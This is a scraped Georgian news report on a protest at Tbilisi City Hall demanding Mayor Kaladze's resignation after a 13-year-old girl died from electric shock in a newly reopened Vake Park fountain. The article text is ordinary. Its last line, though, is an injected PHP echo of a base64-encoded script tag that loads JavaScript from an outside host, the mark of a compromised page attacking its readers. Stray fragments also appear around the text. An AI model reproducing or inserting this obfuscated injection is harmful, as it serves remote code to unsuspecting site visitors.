celsiusi
ავერსი შნაიდერი
"კალაძე, აიღე პასუხისმგებლობა" -  ამ წუთებში  დედაქალაქის მერიასთან სამოქალაქო აქტივისტები, პოლიტიკოსები და რიგითი მოქალაქეები იკრიბებიან. უკვე დაანონსებულია, რომ აქციაზე შეკრებილები  მერს სირცხვილის კორიდორს მოუწყობენ. პროტესტის მთავარი ადრესატიც სწორედ დედქალაქის მერია, აქციის მონაწილეები ვაკის პარკის ტრაგედიიასთან დაავშირებით კახა კალაძის გადადგომას მოითოვენ. 
 
13 ოქტომბერს, დღის პირველ ნახევარში, თბილისში, ვაკის პარკის შადრევანში ჩავარდნილი ბურთის ამოსაღებად ჩასულ სამ ბავშვს დენმა დაარტყა, მათგან ერთი, 13 წლის მარიტა მეფარიშვილი, გარდაიცვალა.
 
მომხდარზე გამოძიება 240-ე პრიმა მუხლის 1-ლი და მე-2 ნაწილით დაიწყო, რაც გულისხმობს ელექტროობიექტზე უსაფრთხოების წესების დარღვევას, რასაც მოჰყვა ადამიანის სიცოცხლის მოსპობა.
 
თბილისის მერიამ  ვაკის პარკის რეაბილიტირებული შადრევანი და მცირე კასკადი 12 ოქტომბერს ტრაგედიამდე 1 დღით ადრე გახსნა. 
468
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");